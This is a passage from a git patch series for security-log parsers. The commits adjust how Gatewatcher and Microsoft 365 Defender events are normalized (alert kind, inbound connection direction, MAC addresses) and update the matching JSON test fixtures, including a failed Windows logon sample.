detailed information about this specific logon request.\\r\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\r\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\r\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"ProcessID\":604,\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"Severity\":\"ERROR\",\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"SubjectDomainName\":\"DOMAINNAME\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserName\":\"TESTACCOUNTS$\",\"SubjectUserSid\":\"S-1-5-18\",\"TargetDomainName\":\"DOMAINNAME\",\"TargetUserName\":\"TEST-USERNAME\",\"sekoia.intake.windows\":\"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"}"
+  },
+  "expected": {
+    "message": "{\"Category\":\"Logon\",\"Channel\":\"Security\",\"EventID\":4625,\"EventType\":\"AUDIT_FAILURE\",\"Hostname\":\"test.test\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Advapi  \",\"LogonType\":\"3\",\"Message\":\"An account failed to log on.\\r\\n\\r\\nSubject:\\r\\n\\tSecurity ID:\\t\\tS-1-5-18\\r\\n\\tAccount Name:\\t\\tTESTACCOUNTS$\\r\\n\\tAccount Domain:\\t\\tDOMAINNAME\\r\\n\\tLogon ID:\\t\\t0x3E7\\r\\n\\r\\nLogon Type:\\t\\t\\t3\\r\\n\\r\\nAccount For Which Logon Failed:\\r\\n\\tSecurity ID:\\t\\tS-1-0-0\\r\\n\\tAccount Name:\\t\\tTEST-USERNAME\\r\\n\\tAccount Domain:\\t\\tDOMAINNAME\\r\\n\\r\\nFailure Information:\\r\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\r\\n\\tStatus:\\t\\t\\t0xC000006D\\r\\n\\tSub Status:\\t\\t0xC000006A\\r\\n\\r\\nProcess Information:\\r\\n\\tCaller Process ID:\\t0x25c\\r\\n\\tCaller Process Name:\\tC:\\\\Windows\\\\System32\\\\lsass.exe\\r\\n\\r\\nNetwork Information:\\r\\n\\tWorkstation Name:\\tTESTACCOUNTS\\r\\n\\tSource Network Address:\\t192.168.128.203\\r\\n\\tSource Port:\\t\\t41974\\r\\n\\r\\nDetailed Authentication Information:\\r\\n\\tLogon Process:\\t\\tAdvapi  \\r\\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\r\\n\\tTransited Services:\\t-\\r\\n\\tPackage Name (NTLM only):\\t-\\r\\n\\tKey Length:\\t\\t0\\r\\n\\r\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\r\\n\\r\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\r\\n\\r\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\r\\n\\r\\nThe Process Information fields indicate which account and process on the system requested the logon.\\r\\n\\r\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\r\\n\\r\\nThe authentication information fields provide detailed information about this specific logon request.\\r\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\r\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\r\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"ProcessID\":604,\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"Severity\":\"ERROR\",\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"SubjectDomainName\":\"DOMAINNAME\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserName\":\"TESTACCOUNTS$\",\"SubjectUserSid\":\"S-1-5-18\",\"TargetDomainName\":\"DOMAINNAME\",\"TargetUserName\":\"TEST-USERNAME\",\"sekoia.intake.windows\":\"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"}",
+    "event": {
+      "action": "authentication_network",
+      "category": [
+        "authentication"
+      ],
+      "code": "4625",
+      "message": "An account failed to log on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tTESTACCOUNTS$\r\n\tAccount Domain:\t\tDOMAINNAME\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Type:\t\t\t3\r\n\r\nAccount For Which Logon Failed:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\tTEST-USERNAME\r\n\tAccount Domain:\t\tDOMAINNAME\r\n\r\nFailure Information:\r\n\tFailure Reason:\t\tUnknown user name or bad password.\r\n\tStatus:\t\t\t0xC000006D\r\n\tSub Status:\t\t0xC000006A\r\n\r\nProcess Information:\r\n\tCaller Process ID:\t0x25c\r\n\tCaller Process Name:\tC:\\Windows\\System32\\lsass.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tTESTACCOUNTS\r\n\tSource Network Address:\t192.168.128.203\r\n\tSource Port:\t\t41974\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\r\n\r\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe Process Information fields indicate which account and process on the system requested the logon.\r\n\r\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.",
+      "outcome": "failure",
+      "provider": "Microsoft-Windows-Security-Auditing",
+      "reason": "Unknown user name or bad password.",
+      "type": [
+        "start"
+      ]
+    },
+    "action": {
+      "id": 4625,
+      "name": "An account failed to log on",
+      "outcome": "failure",
+      "properties": {
+        "Category": "Logon",
+        "EventType": "AUDIT_FAILURE",
+        "IpAddress": "1.2.3.4",
+        "LogonProcessName": "Advapi  ",
+        "LogonType": "3",
+        "ProcessName": "C:\\Windows\\System32\\lsass.exe",
+        "Severity": "ERROR",
+        "SourceName": "Microsoft-Windows-Security-Auditing",
+        "SubjectDomainName": "DOMAINNAME",
+        "SubjectLogonId": "0x3e7",
+        "SubjectUserName": "TESTACCOUNTS$",
+        "SubjectUserSid": "S-1-5-18",
+        "TargetDomainName": "DOMAINNAME",
+        "TargetUserName": "TEST-USERNAME"
+      },
+      "type": "Security"
+    },
+    "host": {
+      "hostname": "test.test",
+      "name": "test.test"
+    },
+    "log": {
+      "hostname": "test.test",
+      "level": "error"
+    },
+    "os": {
+      "family": "windows",
+      "platform": "windows"
+    },
+    "process": {
+      "executable": "C:\\Windows\\System32\\lsass.exe",
+      "id": 604,
+      "name": "lsass.exe",
+      "pid": 604,
+      "working_directory": "C:\\Windows\\System32\\"
+    },
+    "related": {
+      "hosts": [
+        "test.test"
+      ],
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "TESTACCOUNTS$"
+      ]
+    },
+    "sekoiaio": {
+      "authentication": {
+        "process": {
+          "name": "Advapi  "
+        }
+      },
+      "client": {
+        "name": "test.test",
+        "os": {
+          "type": "windows"
+        }
+      },
+      "server": {
+        "name": "test.test",
+        "os": {
+          "type": "windows"
+        }
+      }
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "domain": "DOMAINNAME",
+      "id": "S-1-5-18",
+      "name": "TESTACCOUNTS$",
+      "target": {
+        "domain": "DOMAINNAME",
+        "name": "TEST-USERNAME"
+      }
+    }
+  }
+}
\ No newline at end of file

From abce7e63ed9e744b3e643e302dbaed53573e850c Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 30 Sep 2024 17:17:09 +0200
Subject: [PATCH 086/317] fix(Gatewatcher): add event.kind:alert when
 processing an alert

---
 GateWatcher/aioniq/ingest/parser.yml        | 3 +++
 GateWatcher/aioniq/tests/sigflow-alert.json | 1 +
 2 files changed, 4 insertions(+)

diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 4db8bf1dc..45330587a 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -62,6 +62,9 @@ stages:
           gatewatcher.payload_printable: "{{json_load.message.payload_printable}}"
           gatewatcher.timestamp_analyzed: "{{json_load.message.timestamp_analyzed}}"
           gatewatcher.timestamp_detected: "{{json_load.message.timestamp_detected}}"
+      - set:
+          event.kind: "alert"
+        filter: "{{json_load.message.event_type == 'alert'}}"
       - set:
           observer.mac: >-
             ["{{json_load.message.ether.src_mac}}",
diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json
index 0d72ba216..1de9534f5 100644
--- a/GateWatcher/aioniq/tests/sigflow-alert.json
+++ b/GateWatcher/aioniq/tests/sigflow-alert.json
@@ -15,6 +15,7 @@
       "category": [
         "network"
       ],
+      "kind": "alert",
       "module": "alert",
       "severity": 1
     },

From 93a1bb45928bc1279d95a4f9a265458c089b8a0f Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 30 Sep 2024 17:23:16 +0200
Subject: [PATCH 087/317] test(Microsoft): add a test related to connection
 attempt

---
 .../tests/test_device_network_connection.json | 63 +++++++++++++++++++
 1 file changed, 63 insertions(+)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_network_connection.json

diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
new file mode 100644
index 000000000..9362fa6b2
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
@@ -0,0 +1,63 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    },
+    "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\",\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"direction\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n"
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\",\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"direction\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "device_network_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-09-30T14:00:41.934118Z",
+    "action": {
+      "type": "ConnectionAttempt"
+    },
+    "destination": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 57410
+    },
+    "host": {
+      "id": "dbe5c34434fb4792bea6874dd0b1f107",
+      "name": "ml022"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "21118"
+        }
+      }
+    },
+    "network": {
+      "protocol": "TcpV4"
+    },
+    "process": {
+      "parent": {
+        "pid": 0
+      },
+      "pid": 0
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ]
+    },
+    "source": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "port": 7680
+    }
+  }
+}
\ No newline at end of file

From 9ca0c5802931698d0a09ab18f2b3a3dce936fea7 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 30 Sep 2024 17:34:53 +0200
Subject: [PATCH 088/317] feat(Microsoft): change the filter to parse the
 AdditionalFields property from the event

---
 Microsoft/microsoft-365-defender/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 4e35ad762..5a62fb5f9 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -26,7 +26,7 @@ pipeline:
         input_field: "{{json_event.message.properties.LoggedOnUsers}}"
         output_field: "users"
   - name: parse_additional_fields
-    filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}'
+    filter: '{{json_event.message.get("properties", {}).get("AdditionalFields") | length > 0}}'
     external:
       name: json.parse-json
       properties:

From 07547e86587fb7beffffd62a2d89d5cfd88bb705 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 30 Sep 2024 17:56:06 +0200
Subject: [PATCH 089/317] refactor(Microsoft): move the complexity to the
 set_device_network_event_fields stage

---
 .../microsoft-365-defender/ingest/parser.yml  | 38 ++++++++-----------
 1 file changed, 16 insertions(+), 22 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 5a62fb5f9..3a9a33de7 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -105,7 +105,7 @@ stages:
           event.type: ["info"]
           event.action: "{{json_event.message.properties.Action or json_event.message.properties.DeliveryAction}}"
           agent.version: "{{json_event.message.properties.ClientVersion}}"
-          destination.port: "{{json_event.message.properties.DestinationPort}}"
+          destination.port: "{{json_event.message.properties.RemotePort or json_event.message.properties.DestinationPort}}"
           email.local_id: "{{json_event.message.properties.NetworkMessageId}}"
           email.message_id: "{{json_event.message.properties.InternetMessageId}}"
           email.subject: "{{json_event.message.properties.EmailSubject or json_event.message.properties.Subject}}"
@@ -145,7 +145,7 @@ stages:
           service.type: "{{json_event.message.properties.DetectionSource}}"
           source.geo.city_name: "{{json_event.message.properties.City}}"
           source.geo.country_iso_code: "{{json_event.message.properties.CountryCode}}"
-          source.port: "{{json_event.message.properties.RequestSourcePort}}"
+          source.port: "{{json_event.message.properties.LocalPort or json_event.message.properties.RequestSourcePort}}"
           url.domain: "{{json_event.message.properties.UrlDomain}}"
           url.original: "{{json_event.message.properties.FileOriginUrl or json_event.message.properties.Url}}"
           user.domain: "{{json_event.message.properties.AccountDomain or json_event.message.properties.RequestAccountDomain}}"
@@ -200,18 +200,9 @@ stages:
           microsoft.defender.threat.detection: "{{json_event.message.properties.DetectionMethods}}"
           microsoft.defender.threat.names: "{{json_event.message.properties.ThreatNames}}"
           microsoft.defender.threat.types: "{{json_event.message.properties.ThreatTypes}}"
-      - set:
-          source.port: "{{json_event.message.properties.LocalPort}}"
-        filter: '{{json_event.message.properties.get("LocalPort") and json_event.message.properties.ActionType not in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
-      - set:
-          source.port: "{{json_event.message.properties.RemotePort}}"
-        filter: '{{json_event.message.properties.get("RemotePort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
       - set:
           source.ip: "{{json_event.message.properties.LocalIP}}"
-        filter: '{{json_event.message.properties.get("LocalIP")  | is_ipaddress and json_event.message.properties.ActionType not in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
-      - set:
-          source.ip: "{{json_event.message.properties.RemoteIP}}"
-        filter: '{{json_event.message.properties.get("RemoteIP")  | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+        filter: '{{json_event.message.properties.get("LocalIP")  | is_ipaddress}}'
       - set:
           source.ip: "{{json_event.message.properties.IPAddress}}"
         filter: '{{json_event.message.properties.get("IPAddress")  | is_ipaddress}}'
@@ -227,18 +218,9 @@ stages:
       - set:
           source.ip: "{{json_event.message.properties.SenderIPv6}}"
         filter: '{{json_event.message.properties.get("SenderIPv6")  | is_ipaddress}}'
-      - set:
-          destination.port: "{{json_event.message.properties.RemotePort}}"
-        filter: '{{json_event.message.properties.get("RemotePort") and json_event.message.properties.ActionType not in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
-      - set:
-          destination.port: "{{json_event.message.properties.LocalPort}}"
-        filter: '{{json_event.message.properties.get("LocalPort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
       - set:
           destination.ip: "{{json_event.message.properties.RemoteIP}}"
-        filter: '{{json_event.message.properties.get("RemoteIP")  | is_ipaddress and json_event.message.properties.ActionType not in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
-      - set:
-          destination.ip: "{{json_event.message.properties.LocalIP}}"
-        filter: '{{json_event.message.properties.get("LocalIP")  | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+        filter: '{{json_event.message.properties.get("RemoteIP")  | is_ipaddress}}'
       - set:
           destination.ip: "{{json_event.message.properties.DestinationIPAddress}}"
         filter: '{{json_event.message.properties.get("DestinationIPAddress")  | is_ipaddress}}'
@@ -428,6 +410,18 @@ stages:
       - set:
           event.dataset: "device_network_events"
           event.category: ["network"]
+      - set:
+          source.port: "{{json_event.message.properties.RemotePort}}"
+        filter: '{{json_event.message.properties.get("RemotePort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+      - set:
+          source.ip: "{{json_event.message.properties.RemoteIP}}"
+        filter: '{{json_event.message.properties.get("RemoteIP")  | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+      - set:
+          destination.port: "{{json_event.message.properties.LocalPort}}"
+        filter: '{{json_event.message.properties.get("LocalPort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+      - set:
+          destination.ip: "{{json_event.message.properties.LocalIP}}"
+        filter: '{{json_event.message.properties.get("LocalIP")  | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
   set_device_network_info_fields:
     actions:
       - set:

From 8677e6691c74b4f59471551364001bafc988e1a4 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 30 Sep 2024 18:15:43 +0200
Subject: [PATCH 090/317] refactor(Microsoft): move inboud connection fields in
 a dedicated stage

---
 Microsoft/microsoft-365-defender/ingest/parser.yml | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 3a9a33de7..bde34e8e2 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -60,6 +60,8 @@ pipeline:
     filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceLogonEvents"}}'
   - name: set_device_network_events_fields
     filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents"}}'
+  - name: set_device_network_inbound_connection_fields
+    filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents" and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
   - name: set_device_network_info_fields
     filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkInfo"}}'
   - name: set_device_process_events_fields
@@ -410,18 +412,20 @@ stages:
       - set:
           event.dataset: "device_network_events"
           event.category: ["network"]
+  set_device_network_inbound_connection_fields:
+    actions:
       - set:
           source.port: "{{json_event.message.properties.RemotePort}}"
-        filter: '{{json_event.message.properties.get("RemotePort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+        filter: '{{json_event.message.properties.get("RemotePort") != None}}'
       - set:
           source.ip: "{{json_event.message.properties.RemoteIP}}"
-        filter: '{{json_event.message.properties.get("RemoteIP")  | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+        filter: '{{json_event.message.properties.get("RemoteIP")  | is_ipaddress}}'
       - set:
           destination.port: "{{json_event.message.properties.LocalPort}}"
-        filter: '{{json_event.message.properties.get("LocalPort") and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+        filter: '{{json_event.message.properties.get("LocalPort") != None}}'
       - set:
           destination.ip: "{{json_event.message.properties.LocalIP}}"
-        filter: '{{json_event.message.properties.get("LocalIP")  | is_ipaddress and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+        filter: '{{json_event.message.properties.get("LocalIP")  | is_ipaddress}}'
   set_device_network_info_fields:
     actions:
       - set:

From bf792e3ae828c0fb7729183fa34a4a00b43712f5 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 30 Sep 2024 18:30:16 +0200
Subject: [PATCH 091/317] fix(Microsoft): add support for inbound connection in
 ConnectionAttempt and ConnectionAcknowledged messages

---
 Microsoft/microsoft-365-defender/ingest/parser.yml   |  2 +-
 .../tests/test_device_network_connection.json        | 12 ++++++------
 2 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index bde34e8e2..369b9fc5a 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -61,7 +61,7 @@ pipeline:
   - name: set_device_network_events_fields
     filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents"}}'
   - name: set_device_network_inbound_connection_fields
-    filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents" and json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"]}}'
+    filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkEvents" and (json_event.message.properties.ActionType in ["InboundConnectionAttempt", "InboundConnectionAcknowledged"] or (json_event.message.properties.ActionType in ["ConnectionAttempt", "ConnectionAcknowledged"] and parse_additional_fields.fields.get("direction") == "In"))}}'
   - name: set_device_network_info_fields
     filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceNetworkInfo"}}'
   - name: set_device_process_events_fields
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
index 9362fa6b2..014fc737b 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json
@@ -24,9 +24,9 @@
       "type": "ConnectionAttempt"
     },
     "destination": {
-      "address": "1.2.3.4",
-      "ip": "1.2.3.4",
-      "port": 57410
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "port": 7680
     },
     "host": {
       "id": "dbe5c34434fb4792bea6874dd0b1f107",
@@ -55,9 +55,9 @@
       ]
     },
     "source": {
-      "address": "5.6.7.8",
-      "ip": "5.6.7.8",
-      "port": 7680
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 57410
     }
   }
 }
\ No newline at end of file

From 2753b857c4616b6b8f5cc4fb3068e4f6a626a474 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 30 Sep 2024 18:32:44 +0200
Subject: [PATCH 092/317] feat(Microsoft): extract mac addresses

---
 Microsoft/microsoft-365-defender/ingest/parser.yml           | 5 +++++
 .../tests/test_connection_acknowledged.json                  | 2 ++
 .../tests/test_connection_attempt.json                       | 2 ++
 .../tests/test_device_network_connection.json                | 2 ++
 .../tests/test_inbound_connection_attempt.json               | 2 ++
 5 files changed, 13 insertions(+)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 369b9fc5a..0704ce4ca 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -412,8 +412,13 @@ stages:
       - set:
           event.dataset: "device_network_events"
           event.category: ["network"]
+          source.mac: '{{parse_additional_fields.fields.get("Source Mac")}}'
+          destination.mac: '{{parse_additional_fields.fields.get("Destination Mac")}}'
   set_device_network_inbound_connection_fields:
     actions:
+      - set:
+          source.mac: '{{parse_additional_fields.fields.get("Destination Mac")}}'
+          destination.mac: '{{parse_additional_fields.fields.get("Source Mac")}}'
       - set:
           source.port: "{{json_event.message.properties.RemotePort}}"
         filter: '{{json_event.message.properties.get("RemotePort") != None}}'
diff --git a/Microsoft/microsoft-365-defender/tests/test_connection_acknowledged.json b/Microsoft/microsoft-365-defender/tests/test_connection_acknowledged.json
index ca8f6355f..c8dc84db5 100644
--- a/Microsoft/microsoft-365-defender/tests/test_connection_acknowledged.json
+++ b/Microsoft/microsoft-365-defender/tests/test_connection_acknowledged.json
@@ -26,6 +26,7 @@
     "destination": {
       "address": "1.2.3.4",
